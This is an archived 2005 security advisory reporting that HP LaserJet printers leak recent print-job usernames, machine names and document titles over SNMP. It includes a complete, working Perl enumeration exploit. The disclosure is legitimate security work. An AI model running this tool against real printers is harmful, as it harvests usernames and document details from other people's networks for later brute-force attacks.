[NEWS] HP LaserJet Information Disclosure
From: SecuriTeam (support_at_securiteam.com)
Date: 09/29/05
- Previous message: SecuriTeam: "[NEWS] Nokia OBEX DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 29 Sep 2005 15:39:56 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
HP LaserJet Information Disclosure
------------------------------------------------------------------------
SUMMARY
HP LaserJet printers has an extensive administrative user interface
provided over SNMP. SNMP is normally used for monitoring applications and
servers performance but can also be used to perform remote configurations.
Fully access document information exists on HP LaserJet printers that
allow attackers retrieve sensitive information from the printers.
DETAILS
Vulnerable Systems:
* HP LaserJet 2430
Pinion has discovered that HP LaserJet printers store information
regarding recently printed documents. Information such as document name,
title, number of pages, document size, user who has printed the document
and the machine name where the print job was initiated.
This document information "cache" is flushed when the document is older
then one hour but in mean time, the information can be obtained by anyone
with access to the network and who has information regarding the "public"
SNMP community configured at the printer.
In reality, an intruder could use this information to obtain possible
usernames that later could be used in a login brute force attack against
servers.
Vendor response :
"This information is kept by the printer in the printer specific MIB.
Jetdirect controls the authentication and subsequent authorization to all
the MIBs. This authentication/authorization can be controlled via SNMP
settings."
Reference:
<http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?locale=en_US&contentType=SupportManual&docIndexId=3124&prodTypeId=18972&prodSeriesId=416419&lang=en&cc=us> "HP Jetdirect Embedded Print Server Administrator's Guide":
Additional information regarding HP Jetdirect security is available here:
<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999> http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999
<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00004828> http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00004828
Exploit:
#!/usr/bin/perl
#####################################################################
##
## HP LaserJet SNMP User name enumeration tool v0.2 by
## Pinion Labs 050705
## george[46]hedfors[64]pinion[46]se
## http://www.pinion.se
##
## Description
## HP LaserJet printers loggs recent printed documents with
## timestamp, size, number of pages, username and machine name.
## These can be extracted using a specially crafted SNMP Object ID.
##
## Document name under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1
## Document pages under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12
## Document size under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14
## Usernames are found under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1
## Machine names under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2
##
## Output format
## DocID:Username:Machine:Pages:Size:DocName
##
##
use Net::SNMP;
## Number of errors in row that is tolerated before exit
$tolerance = 10;
## Default SNMP community to use
$defcommunity = "public";
## Default SNMP port to use
$defport = 161;
### END OF CONFIG ###
$host = $ARGV[0] || die "syntax: $0 victim.com \[community\] ".
"\[startid\]\n";
$community = $ARGV[1] || $defcommunity;
$startid = $ARGV[2] || 0;
($session, $error) = Net::SNMP->session(-hostname => $host,
-community => $community,
-port => $defport);
if (!defined($session)) {
printf("ERROR: %s.\n", $error);
exit 1;
}
for($i = $startid; $err < $tolerance; $i++) {
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1.$i.0";
$result = $session->get_request(-varbindlist => [$oid]);
if (!defined($result)) {
if($found > 0) {
$err++;
}
} else {
$found++;
($null, $user) = split(/\=/, $result->{$oid}, 2);
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2.$i.0";
$result = $session->get_request(-varbindlist => [$oid]);
($null, $id) = split(/\=/, $result->{$oid}, 2);
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1.$i.0";
$result = $session->get_request(-varbindlist => [$oid]);
$doc = hex2ascii($result->{$oid});
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12.$i.0";
$result = $session->get_request(-varbindlist => [$oid]);
$pages = $result->{$oid};
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14.$i.0";
$result = $session->get_request(-varbindlist => [$oid]);
$size = $result->{$oid};
printf("%d:%s:%s:%s:%s:%s\n", $i, $user, $id, $pages,
$size, $doc);
$err = 0;
}
}
$session->close;
exit 0;
sub hex2ascii() {
my $hex = shift;
my $asc;
for($n = 6; $n < length($hex); $n += 2) {
$asc .= chr(hex(substr($hex, $n, 2)));
}
return $asc;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:lab@pinion.se> Pinion Lab.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Nokia OBEX DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] Squid Web Proxy Cache Remote DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Squid Web Proxy Cache is
a full-featured ... web proxy cache designed to run on Unix systems. ... Remote
exploitation of a design error in the SNMP module of Squid Web ... (Securiteam) - [TOOL] Snmpfuzz - SNMPv1 Fuzzer
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... problem when using it is difficulty
in determining which particular SNMP ... Also, you can not send a single testcase packet,
only the whole ... happened is to run a debugger on the SNMP service problem. ...
(Securiteam) - PTL Advisory 050825 - HP LaserJet Network Username and Information Enumeration
... Pinion Security Consulting AB ... HP LaserJet Network Username and Information
Enumeration ... Possibly other HP printers that operate using the Jetdirect ...
SNMP is normally used for monitoring applications ... (Bugtraq) - [EXPL] HP LaserJet Network Username and Information Enumeration
... Get your security news from a reliable source. ... HP LaserJet printers
has an extensive administrative user interface ... provided over SNMP. ... HP LaserJet
stores network information from document print requests, ... (Securiteam) - RE: SNMP Traffic over spoolsv.exe ?
... HP loves to use SNMP to talk to their networked printers, ... > -
Precisely Define and Implement Network Security ... > FIND OUT NOW - FREE Vulnerability
Assessment Toolkit ... (Security-Basics)
